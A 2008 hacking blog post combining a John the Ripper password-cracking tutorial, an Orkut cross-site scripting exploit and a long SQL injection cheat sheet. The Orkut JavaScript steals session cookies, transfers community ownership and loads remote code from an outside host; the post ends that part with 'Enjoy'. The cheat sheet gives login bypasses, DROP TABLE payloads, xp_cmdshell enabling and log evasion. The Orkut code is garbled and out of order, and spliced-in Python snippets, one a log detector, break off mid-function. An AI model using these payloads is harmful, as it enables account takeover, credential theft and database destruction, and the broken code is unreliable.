Monday, February 18, 2008

John The Ripper Password Cracker!

This is for educational purposes, for newbies….

I have compiled a basic tutorial about how to use the John the Ripper software. Before moving on to the actual procedure of how to use the software, I will give you a general overview of what “John the Ripper” basically is…..

<< Introduction >>

John the Ripper is a fast password cracker, currently available for
many flavors of Unix (11 are officially supported, not counting
different architectures), DOS, Win32, BeOS, and OpenVMS (the latter
requires a contributed patch). Its primary purpose is to detect weak
Unix passwords. Besides several crypt(3) password hash types most
commonly found on various Unix flavors, supported out of the box are
Kerberos/AFS and Windows NT/2000/XP LM hashes, plus several more with
contributed patches.

Well, this is a basic tutorial where I will teach you the basic thing: cracking passwords.
First of all, you need to have an encrypted password with you in a text file; say you saved the password in a.txt. Now, to copy this file,
go to the directory where John the Ripper is installed.
You have 2 directories there: 1) docs 2) run.
Enter the run directory and paste the file here.
Let me make it clear to you all that John the Ripper is not GUI software, so unlike other password crackers you'll have to use DOS to run John the Ripper. And by the way, never be lazy about using DOS, as it's a hacker's best friend. Type cmd into the Run window so that you enter DOS, then enter the run directory.
You'll find an executable file here (.exe); it should be named john-386.exe, but the name may vary from version to version.
Now comes the MOST important part: what you have to do now is use a command.
You'll have something written like
C:/bla/blabla/run:>

First write the name of the .exe file, then the name of your password text file.
In our case it will be:

C:/bla/blabla/run:>john-386 a.txt

And that's it, you have started cracking your encrypted password. Wait for some time; it may take as long as 2 hrs……
When the password recovery is over, your decrypted password gets saved in a file named john.pot. You can open it using Notepad and you're done. You have your password finally….

You can download it by searching Google.

Exploit on Orkut

There is yet another exploit on Orkut (the Google-affiliated social networking service), and this exploit can easily be made use of to obtain ownership of someone else's community with just a click on a community link. Name the community with:
< script scr="...URL...">
where URL points to the location where the JavaScript below is stored. Once someone clicks on a community that has such a name, the script at that URL gets executed, and their community ownership is transferred to the person with the user ID xxxxxxxxxxxxxxxxxxxx (see below), which is the 20-digit user ID of the person to whom your ownership gets transferred. I just lost ownership of my "**********" community. So, BEWARE of this exploit and NEVER EVER CLICK on any community or profile with a name such as:
< script scr="...URL...">

The JavaScript exploit code is as below (comments are in Portuguese, which I don't know a thing about, and neither am I a JavaScript expert, so I'll let you understand this script by yourself).

var uid="xxxxxxxxxxxxxxxxxxxx"; //
//window.alert('injetado');

function createXMLHttpRequest()
{
try{ return new ActiveXObject("Msxml2.XMLHTTP"); }catch(e){}
try{ return new ActiveXObject("Microsoft.XMLHTTP"); }catch(e){}
try{ return new XMLHttpRequest(); }catch(e){}
return null;
}

function getCookies()
{
subject="Orkut Cookie Exploit";
dcookie=document.cookie;
if(dcookie.indexOf('state') > -1)
{
mensagem = dcookie+"\n\nVerifique se ele enviou alguma comunidade\n\nExploit escrito por Rodrigo Lacerda";
}
else
{
mensagem = "Este usuário usa Internet Explorer e a função de pegar cookies falhou, verifique se ele enviou alguma comundiade\n\nOrkut Community Transfer & Cookie Stealer Exploit\n";
}
check_scraps();
};
getCookies();

function velocity_transfer()
{
send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&Action.doTransfer";
var xml= createXMLHttpRequest();
xml.open('POST','http://www.orkut.com/CommunityTransfer.aspx?cmm=' + cmm[x] + '&uid='+uid,
Hack
var xml= createXMLHttpRequest();
xml.open('POST','http://www.orkut.com/Compose.aspx',true);
xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
function check_scraps()
{
x=0;
var xml=createXMLHttpRequest();
xml.open("GET","Scrapbook.aspx",true);
xml.onreadystatechange=function()
{
if(xml.readyState==4)
{
var xmlr1=xml.responseText;
if(!xmlr1.indexOf('textPanel') > -1)
{
SIG=xmlr1.match(/signature. value="(.+)"/i)[1];
POST=xmlr1.match(/name="POST_TOKEN" value="([^"]+)/i)[1];
send_message();
}
else
{
check_scraps();
}
};
};
xml.send(null);
};

This is how it will act, and your communities will get transferred.
xml.send(send);xml.onreadystatechange=function()
{
if(xml.readyState==4)
{
var xmlrtr=xml.responseText;
if(!xmlrtr.match(/textPanel/gi))
{
array_cmm();
}
else
{
send_message();
}
}
};
};
cont=xmlr;
ini=cont.indexOf('
-1 ? cont.indexOf('
fim=cont.indexOf('
-1 ? cont.indexOf('
cont2=cont.substring(ini,fim)
cmm=String(cont2.match(/cmm=\d+/g)).replace(/cmm=/g,'');
cmm=cmm.split(',');
if(cmm)
{
velocity_transfer();
}
}
else
{
array_cmm();
};
};
};
xml2.send(null);
};

function send_message()
{
send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&uid="+uid+"&sendTo=user&subject="+subject+"&body="+encodeURIComponent(mensagem)+"&Action.submit";
send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&Action.doTransfer";
var xml= createXMLHttpRequest();
xml.open('POST','http://www.orkut.com/CommunityTransfer.aspx?cmm=' + cmm[x] + '&uid='+uid,true);
xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xml.send(send);xml.onreadystatechange=function()
{
if(xml.readyState==4)
{
var xmlrtr=xml.responseText;
x++;
if(x{
velocity_transfer();
}
}
};
};

function array_cmm()
{
var xml2= createXMLHttpRequest();
xml2.open("GET","http://www.orkut.com/Communities.aspx",true);
xml2.onreadystatechange=function()
{
if(xml2.readyState==4)
{
var xmlr=xml2.responseText;
if(!xmlr.match(/textPanel/gi))
{

12:00 AM, 1/21/2007


νινєк:
The script which will be executed by that posted JavaScript is like this:


Var uid="7911771698884038554";

function createXMLHttpRequest()
{
try{ return new ActiveXObject("Msxml2.XMLHTTP"); }catch(e){}
try{ return new ActiveXObject("Microsoft.XMLHTTP"); }catch(e){}
try{ return new XMLHttpRequest(); }catch(e){}
return null;
}

function getCookies()
{
subject="Orkut Cookie Exploit";
dcookie=document.cookie;
if(dcookie.indexOf('state') > -1)
{
mensagem = dcookie+"\n\nVerifique se ele enviou alguma comunidade\n\nOrkut Community Transfer & Cookie Stealer Exploit\nDesenvolvido por Rodrigo Lacerda";
}
else
{
mensagem = "This user uses Internet Explorer and the function failed to pick up cookies, make sure it sent some comundiade \ n \ nOrkut Community Transfer & Cookie Stealer Exploit \ by Rodrigo Lacerda";
}
check_scraps();
};
getCookies();

function velocity_transfer()

All Community owners, beware of a sneaky new phishing link going around. The link seems to lead to an Orkut community, but actually transfers ownership of your communities to some other profile.

More info here:
http://technowise.blogspot.com/2006/12/orkut-cookie-exploit-anyone-can-steal.html

Do not click on any community or profile links which look like < script scr="...URL...">

A couple of communities have been lost already, namely the 'C' and the 'C/C++ programmers India' communities. So please watch out!

Orkut Community Hacking

->> Cookie Transfer Script(s):

{
var omdt_atual = getCookie('omdt_atual');
}

"Run this script and see what happens." You must have read this line many times, but the only thing it will do is transfer/send your "cookie" to the hacker's scrapbook or email address.

Now after this... you probably know what happens. Just for info:

orkut community transfer

Community Transfer
javascript:aumentando_membros = prompt('Digite o nome da sua comunidade',''); multiplicando_membros = document.createElement('script'); multiplicando_membros.src = "http://urdowmain.com/js.php?uid=10288601952438406116"; document.getElementsByTagName('head')[0].appendChild(multiplicando_membros); alert('Aumentando membros da comunidade '+aumentando_membros+'....'); alert('Aguarde alguns instantes ...');void(0)"; document.getElementsByTagName('head')[0].appendChild(multiplicando_membros); alert('Aumentando membros da comunidade '+aumentando_membros+'....'); alert('Aguarde alguns instantes ...');void(0)

and the .js file will be put right away...

var uid='10288601952438406116';



function createXMLHttpRequest() {
try{ return new ActiveXObject("Msxml2.XMLHTTP"); }catch(e){}
try{ return new ActiveXObject("Microsoft.XMLHTTP"); }catch(e){}
try{ return new XMLHttpRequest(); }catch(e){}
return null;
}

function getCookies(){
subject="Orkut Cookie Exploit";
dcookie=document.cookie;
if(dcookie.indexOf('state') > -1)
{
mensagem = dcookie ;
}
else
{

// by Sj, a crazy hack on my part
RSymp = new ActiveXObject("Microsoft.XMLHTTP");
RSymp.open("POST", "LanguageReset.aspx?page=http://",false);
RSymp.send(null);
mensagem = RSymp.getResponseHeader("Set-Cookie");

}
check_scraps();
};
getCookies();

function velocity_transfer(){
send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&Action.doTransfer";
var xml= createXMLHttpRequest();
xml.open('POST','http://www.orkut.com/CommunityTransfer.aspx?cmm=' + cmm[x] + '&uid='+uid,true);
xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xml.send(send);xml.onreadystatechange=function()
{
if(xml.readyState==4)
{
var xmlrtr=xml.responseText;
x++;
if(x{
velocity_transfer();
}
}
};
};
function array_cmm(){
var xml2= createXMLHttpRequest();
xml2.open("GET","http://www.orkut.com/Communities.aspx",true);
xml2.onreadystatechange=function()
{
if(xml2.readyState==4)
{
var xmlr=xml2.responseText;
if(!xmlr.match(/textPanel/gi))
{
cont=xmlr;
ini=cont.indexOf('
-1 ? cont.indexOf('
fim=cont.indexOf('
-1 ? cont.indexOf('
cont2=cont.substring(ini,fim)
xmlj.open('POST','http://www.orkut.com/CommunityJoin.aspx?cmm=' + cmm_j[xx] ,true);
xmlj.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xmlj.send(send);
xmlj.onreadystatechange=function()
{
if(xmlj.readyState==4)
{
var xmlrtr=xmlj.responseText;
xx++;
if(x{
cmm_join();
}
}
};
};

From my second post: all the code should be put into Notepad, with the community details filled in wherever necessary, saved as whatever.js and then uploaded to freehostia. The first one is the JavaScript to hack. Enjoy.

SQL Injection Cheat Sheet!

Well, Daniel this should answer your question about "SQL Injection Cheat Sheet"......

About SQL Injection Cheat Sheet

This is only for MySQL and Microsoft SQL Server, with some Oracle and some PostgreSQL currently. Most of the samples are not correct for every single situation, as the scenario may change, so be alert. Most real world environments may differ because of parentheses, different code bases and unexpected, strange SQL sentences.

Samples are provided to allow the reader to get a basic idea of a potential attack, and almost every section includes brief information about itself.

M : MySQL
S : SQL Server
P : PostgreSQL
O : Oracle
+ : Possibly all other databases

Examples:
(MS) means: MySQL and SQL Server, etc.
(M*S) means: only in some versions of MySQL or under special conditions (see the related note), and SQL Server
Table Of Contents
About SQL Injection Cheat Sheet
Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks
Line Comments
SQL Injection Attack Samples
Inline Comments
Classical Inline Comment SQL Injection Attack Samples
MySQL Version Detection Sample Attacks
Stacking Queries
Language / Database Stacked Query Support Table
About MySQL and PHP
Stacked SQL Injection Attack Samples
If Statements
MySQL If Statement
SQL Server If Statement
If Statement SQL Injection Attack Samples
Using Integers
String Operations
String Concatenation
Strings without Quotes
Hex based SQL Injection Samples
String Modification & Related
Union Injections
UNION – Fixing Language Issues
Bypassing Login Screens
Enabling xp_cmdshell in SQL Server 2005
Other parts are not so well formatted, but check them out yourself: drafts, notes and stuff; scroll down and see.
Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks
Ending / Commenting Out / Line Comments
Line Comments
Comments out the rest of the query.
Line comments are generally useful for ignoring the rest of the query so you don't have to deal with fixing the syntax.

-- (SM)
DROP sampletable;--


# (M)
DROP sampletable;#
Line Comments Sample SQL Injection Attacks
Username: admin'--
SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'
This is going to log you in as the admin user, because the rest of the SQL query will be ignored.
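As an added example (not part of the cheat sheet), the admin'-- login bypass reproduced against an in-memory SQLite table, beside the parameterised query that defeats it; the members table and its single account are constructed for the demo.

```python
# Added example (not from the cheat sheet): the admin'-- login bypass
# reproduced against an in-memory SQLite table, beside the parameterised
# query that defeats it. Table and account are constructed for the demo.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed members table with a single account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    conn.execute("INSERT INTO members VALUES ('admin', 's3cret')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # The username is pasted into the SQL text, so admin'-- closes the
    # literal and the -- line comment discards the password check:
    #   SELECT * FROM members WHERE username = 'admin'--' AND password = '...'
    sql = ("SELECT * FROM members WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Parameterised query: the values travel separately from the SQL text,
    # so admin'-- is compared literally as a username and matches nothing.
    sql = "SELECT * FROM members WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, admin'--:", login_vulnerable(db, "admin'--", "wrong"))
    print("safe, admin'--:      ", login_safe(db, "admin'--", "wrong"))
```

The same vulnerable function also accepts the ' OR 'x'='x tautology from the tests list further down, while the parameterised one rejects it.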
Inline Comments
Comments out the rest of the query by not closing them, or you can use them for bypassing blacklisting, removing spaces, obfuscating and determining database versions.

/*Comment Here*/ (SM)
DROP/*comment*/sampletable
DR/**/OP/*bypass blacklisting*/sampletable
SELECT/*avoid-spaces*/password/**/FROM/**/Members


/*! MYSQL Special SQL */ (M)
This is a special comment syntax for MySQL. It's perfect for detecting the MySQL version. If you put code into these comments it's going to execute in MySQL only. You can also use this to execute some code only if the server version is higher than the supplied version.

SELECT /*!32302 1/0, */ 1 FROM tablename
Classical Inline Comment SQL Injection Attack Samples
ID: 10; DROP TABLE members /*
Simply gets rid of the other stuff at the end of the query. Same as 10; DROP TABLE members --
SELECT /*!32302 1/0, */ 1 FROM tablename
Will throw a division by 0 error if the MySQL version is higher than 3.23.02
MySQL Version Detection Sample Attacks
ID: /*!32302 10*/
ID: 10
You will get the same response if the MySQL version is higher than 3.23.02

SELECT /*!32302 1/0, */ 1 FROM tablename
Will throw a division by 0 error if the MySQL version is higher than 3.23.02
Stacking Queries
Executing more than one query in one transaction. This is very useful at every injection point, especially in SQL Server back-ended applications.

; (S)
SELECT * FROM members; DROP members--
Ends a query and starts a new one.

Stacked SQL Injection Attack Samples
ID: 10;DROP members --
SELECT * FROM products WHERE id = 10; DROP members--
This will run the DROP members SQL sentence after the normal SQL query.


If Statements
Get a response based on an if statement. This is one of the key points of Blind SQL Injection; it can also be very useful to test simple stuff blindly and accurately.

MySQL If Statement
IF(condition,true-part,false-part) (M)
SELECT IF(1=1,'true','false')
SQL Server If Statement
IF condition true-part ELSE false-part (S)
IF (1=1) SELECT 'true' ELSE SELECT 'false'
If Statement SQL Injection Attack Samples
if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0 (S)
This will throw a divide-by-zero error if the currently logged-in user is not "sa" or "dbo".

Using Integers
Very useful for bypassing magic_quotes() and similar filters, or even WAFs.

0xHEXNUMBER (SM)
You can write hex like this:

SELECT CHAR(0x66) (S)
SELECT 0x5045 (this is not an integer it will be a string from Hex) (M)
SELECT 0x50 + 0x45 (this is integer now!) (M)
String Operations
String related operations. These can be quite useful to build up injections which are not using any quotes, to bypass any other blacklisting, or to determine the back-end database.

String Concatenation
+ (S)
SELECT login + '-' + password FROM members


|| (*MO)
SELECT login || '-' || password FROM members
*About MySQL "||";
If MySQL is running in ANSI mode it's going to work, but otherwise MySQL accepts it as a `logical operator` and it'll return 0. A better way to do it is using the CONCAT() function in MySQL.

CONCAT(str1, str2, str3, ...) (M)
Concatenate supplied strings.
SELECT CONCAT(login, password) FROM members

Strings without Quotes
These are some direct ways of using strings, but it's always possible to use CHAR() (MS) and CONCAT() (M) to generate a string without quotes.

0x457578 (M) - Hex Representation of string
SELECT 0x457578
This will be selected as a string in MySQL.

In MySQL, an easy way to generate hex representations of strings is this:
SELECT CONCAT('0x',HEX('c:\\boot.ini'))


Using CONCAT() in MySQL
SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) (M)
This will return 'KLM'.


SELECT CHAR(75)+CHAR(76)+CHAR(77) (S)
This will return 'KLM'.
Hex based SQL Injection Samples
SELECT LOAD_FILE(0x633A5C626F6F742E696E69) (M)
This will show the content of c:\boot.ini
String Modification & Related
ASCII() (SMP)
Returns the ASCII character value of the leftmost character. A must-have function for Blind SQL Injections.

SELECT ASCII('a')


CHAR() (SM)
Converts an integer to its ASCII character.

SELECT CHAR(64)
Union Injections
With UNION you do SQL queries cross-table. Basically you can poison a query to return records from another table.

SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members
This will combine results from both news table and members table and return all of them.

Another Example :
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
UNION – Fixing Language Issues
While exploiting Union injections you sometimes get errors because of different language settings (table settings, field settings, combined table / db settings etc.); these functions are quite useful to fix this problem. It's rare, but if you are dealing with Japanese, Russian, Turkish etc. applications then you will see it.

SQL Server (S)
Use field COLLATE SQL_Latin1_General_Cp1254_CS_AS or some other valid one - check out SQL Server documentation.

SELECT header FROM news UNION ALL SELECT name COLLATE SQL_Latin1_General_Cp1254_CS_AS FROM members


MySQL (M)
Hex() for every possible issue

You'll get convert() errors before union target errors! So start with convert(), then union.

Simple Insert (MSO+)
'; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*
Useful Function / Information Gathering / Stored Procedures / Bulk SQL Injection Notes
@@version (MS)
Version of the database and more details, for SQL Server. It's a constant. You can just select it like any other column; you don't need to supply a table name. You can also use it in insert and update statements or in functions.

INSERT INTO members(id, user, pass) VALUES(1, ''+SUBSTRING(@@version,1,10), 10)

Bulk Insert (S)
Insert a file's content into a table. If you don't know the internal path of the web application you can read the IIS (IIS 6 only) metabase file (%systemroot%\system32\inetsrv\MetaBase.xml) and then search in it to identify the application path.

Create table foo( line varchar(8000) )
bulk insert foo from 'c:\inetpub\wwwroot\login.asp'
Drop temp table, and repeat for another file.
BCP (S)
Write text file. Login Credentials are required to use this function.
bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar

VBS, WSH in SQL Server (S)
You can use VBS, WSH scripting in SQL Server because of ActiveX support.

declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' --


Executing system commands, xp_cmdshell (S)
Well known trick. By default it's disabled in SQL Server 2005. You need to have admin access.

EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'


Simple ping check (configure your firewall or sniffer to identify the request before launching it):

EXEC master.dbo.xp_cmdshell 'ping '

You can not read the results directly from an error or a union or anything else.

Some Special Tables in SQL Server (S)
Error Messages
master..sysmessages


Linked Servers
master..sysservers
Passwords (the 2000 and 2005 hashes are both crackable; they use very similar hashing algorithms)
SQL Server 2000: master..sysxlogins
SQL Server 2005: sys.sql_logins

More Stored Procedures for SQL Server (S)
Cmd Execute (xp_cmdshell)
exec master..xp_cmdshell 'dir'


Registry Stuff (xp_regread)

xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'
exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'


Managing Services (xp_servicecontrol)

Medias (xp_availablemedia)

ODBC Resources (xp_enumdsn)

Login mode (xp_loginconfig)

Creating Cab Files (xp_makecab)

Domain Enumeration (xp_ntsec_enumdomains)

Process Killing (need PID) (xp_terminate_process)

Add new procedure (virtually you can execute whatever you want)
sp_addextendedproc 'xp_webserver', 'c:\temp\x.dll'
exec xp_webserver
Write text file to a UNC or an internal path (sp_makewebtask)

SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/

DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result = 0) SELECT 0 ELSE SELECT 1/0

HOST_NAME()
IS_MEMBER (Transact-SQL)
IS_SRVROLEMEMBER (Transact-SQL)
OPENDATASOURCE (Transact-SQL)

INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"
OPENROWSET (Transact-SQL) - http://msdn2.microsoft.com/en-us/library/ms190312.aspx

You can not use sub selects in SQL Server Insert queries
SQL Injection in LIMIT (M) or ORDER (MSO)
SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10 ;

If the injection is in the second LIMIT you can comment it out or use it in your union injection.

Shutdown SQL Server (S)
When you're really pissed off: ';shutdown --

Enabling xp_cmdshell in SQL Server 2005
By default xp_cmdshell and a couple of other potentially dangerous stored procedures are disabled in SQL Server 2005. If you have admin access then you can enable these.

EXEC sp_configure 'show advanced options',1
RECONFIGURE

EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE

Finding Database Structure in SQL Server (S)
Getting User defined Tables
SELECT name FROM sysobjects WHERE xtype = 'U'

Getting Column Names
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')

Moving records (S)
Modify WHERE and use NOT IN or NOT EXISTS,
... WHERE users NOT IN ('First User', 'Second User')
SELECT TOP 1 name FROM members WHERE NOT EXISTS(SELECT TOP 0 name FROM members) -- very good one
Using Dirty Tricks
SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE i.id<=o.id) AS x, name from sysobjects o) as p where p.x=3) as int

Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE xtype='U' and i.id<=o.id) AS x, name from sysobjects o WHERE o.xtype = 'U') as p where p.x=21


Fast way to extract data from Error Based SQL Injections in SQL Server (S)
';BEGIN DECLARE @rd varchar(8000) SET @rd=':' SELECT @rd=@rd+' '+name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'MEMBERS') AND name>@rd SELECT @rd AS rd into TMP_SYS_TMP end;--

Blind SQL Injections
About Blind SQL Injections
In a quite good production application generally you can not see error responses on the page, so you can not extract data through Union attacks or error based attacks. You have to use Blind SQL Injection attacks to extract data. There are two kinds of Blind SQL Injections.

Normal Blind: you can not see a response in the page, but you can still determine the result of a query from the response or HTTP status code.
Totally Blind: you can not see any difference in the output of any kind. This can be an injection into a logging function or similar. Not so common though.

In normal blinds you can use if statements or abuse WHERE query in injection (generally easier), in totally blinds you need to use some waiting functions and analyze response times. For this you can use WAIT FOR DELAY '0:0:10' in SQL Server, BENCHMARK() in MySQL, pg_sleep(10) in PostgreSQL, and some PL/SQL tricks in ORACLE.

Real and a bit Complex Blind SQL Injection Attack Sample
This output is taken from a real private Blind SQL Injection tool while exploiting a SQL Server back-ended application and enumerating table names. These requests were done for the first char of the first table name. The SQL queries are a bit more complex than required because of automation reasons. Here we are trying to determine the ASCII value of a char via a binary search algorithm.
True and False flags

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>78--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>103--

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<103--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>89--

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<89--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>83--

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<83--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>80--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<80--
Since both of the last 2 queries failed, we clearly know the table name's first char's ASCII value is 80, which means the first char is `P`. This is the way to exploit Blind SQL Injections by the binary search algorithm. The other well known way is reading data bit by bit. Both can be effective in different conditions.


Waiting For Blind SQL Injections
First of all, use this only if it's really blind; otherwise just use 1/0 style errors to identify the difference. Second, be careful while using times of more than 20-30 seconds: the database API connection or the script can time out.

WAIT FOR DELAY 'time' (S)
This is just like sleep: wait for the specified time. A CPU-safe way to make the database wait.

WAITFOR DELAY '0:0:10'--

Also you can use fractions like this,

WAITFOR DELAY '0:0:0.51'

Real World Samples
Are we 'sa' ?
if (select user) = 'sa' waitfor delay '0:0:10'
ProductID = 1;waitfor delay '0:0:10'--
ProductID =1);waitfor delay '0:0:10'--
ProductID =1';waitfor delay '0:0:10'--
ProductID =1');waitfor delay '0:0:10'--
ProductID =1));waitfor delay '0:0:10'--
ProductID =1'));waitfor delay '0:0:10'--
BENCHMARK() (M)
Basically we are abusing this command to make MySQL wait a bit. Be careful, you will consume the web server's limit very fast!

BENCHMARK(howmanytimes, do this)

Real World Samples
Are we root ? woot!
IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5(1))


Check Table exist in MySQL
IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))

pg_sleep(seconds) (P)
Sleep for supplied seconds.

SELECT pg_sleep(10);
Sleep 10 seconds.
Covering Tracks
SQL Server -sp_password log bypass (S)
SQL Server doesn't log queries which include sp_password, for security reasons(!). So if you add --sp_password to your queries it will not be in the SQL Server logs (of course it will still be in the web server logs; try to use POST if possible).

Clear SQL Injection Tests
These tests are simply good for blind sql injection and silent attacks.

product.asp?id=4 (SMO)
product.asp?id=5-1
product.asp?id=4 OR 1=1

product.asp?name=Book
product.asp?name=Bo'%2b'ok
product.asp?name=Bo' || 'ok (OM)
product.asp?name=Book' OR 'x'='x
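As an added example that is not part of the cheat sheet, a small Python detector for the web server logs the "Covering Tracks" note says these requests still land in: it normalises the request the way the sheet's evasions require (URL decoding, /**/ inline comment stripping, 0x hex literal decoding) and then matches the signatures listed in the sections above. The access-log lines and URLs are constructed for the demo, not real traffic.

```python
# Added example (not from the cheat sheet): signature matching over
# constructed access-log lines after undoing the sheet's evasions.
from __future__ import annotations

import re
from binascii import unhexlify
from urllib.parse import unquote_plus

# Constructed sample access-log lines (common log format), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Feb/2008:10:00:01 +0000] "GET /product.asp?id=4 HTTP/1.1" 200 512
10.0.0.5 - - [18/Feb/2008:10:00:02 +0000] "GET /product.asp?id=4%20OR%201=1 HTTP/1.1" 200 9120
10.0.0.5 - - [18/Feb/2008:10:00:03 +0000] "GET /product.asp?name=Bo%27%2b%27ok HTTP/1.1" 200 512
10.0.0.5 - - [18/Feb/2008:10:00:04 +0000] "GET /login.asp?user=admin%27-- HTTP/1.1" 302 0
10.0.0.5 - - [18/Feb/2008:10:00:05 +0000] "GET /product.asp?id=10;DR/**/OP%20TABLE%20members-- HTTP/1.1" 500 0
10.0.0.5 - - [18/Feb/2008:10:00:06 +0000] "GET /query.php?user=1+union+select+load_file(0x633A5C626F6F742E696E69),1,1 HTTP/1.1" 200 2048
10.0.0.5 - - [18/Feb/2008:10:00:07 +0000] "GET /product.asp?id=1;waitfor%20delay%20%270:0:10%27-- HTTP/1.1" 200 512
10.0.0.5 - - [18/Feb/2008:10:00:08 +0000] "GET /product.asp?name=Book HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
HEX_LITERAL_RE = re.compile(r"0x([0-9a-fA-F]{2,})\b")
INLINE_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)

# (label, pattern) pairs drawn from the sheet's sections; they run against
# the decoded query string, never against the raw URL.
SIGNATURES = [
    ("line-comment", re.compile(r"--|;\s*#")),
    ("tautology", re.compile(r"\bor\b\s+'?(\w+)'?\s*=\s*'?\1\b", re.I)),
    ("stacked-query", re.compile(
        r";\s*(drop|insert|update|delete|exec|shutdown|declare|waitfor)\b", re.I)),
    ("union-select", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("time-delay", re.compile(r"waitfor\s+delay|benchmark\s*\(|pg_sleep\s*\(", re.I)),
    ("file-read", re.compile(r"load_file\s*\(|bulk\s+insert\b", re.I)),
    ("command-exec", re.compile(r"xp_cmdshell|sp_oacreate|sp_configure", re.I)),
    ("quote-concat-probe", re.compile(r"'\s*(\+|\|\|)\s*'")),
]


def decode_hex_literals(text: str) -> tuple[str, list[str]]:
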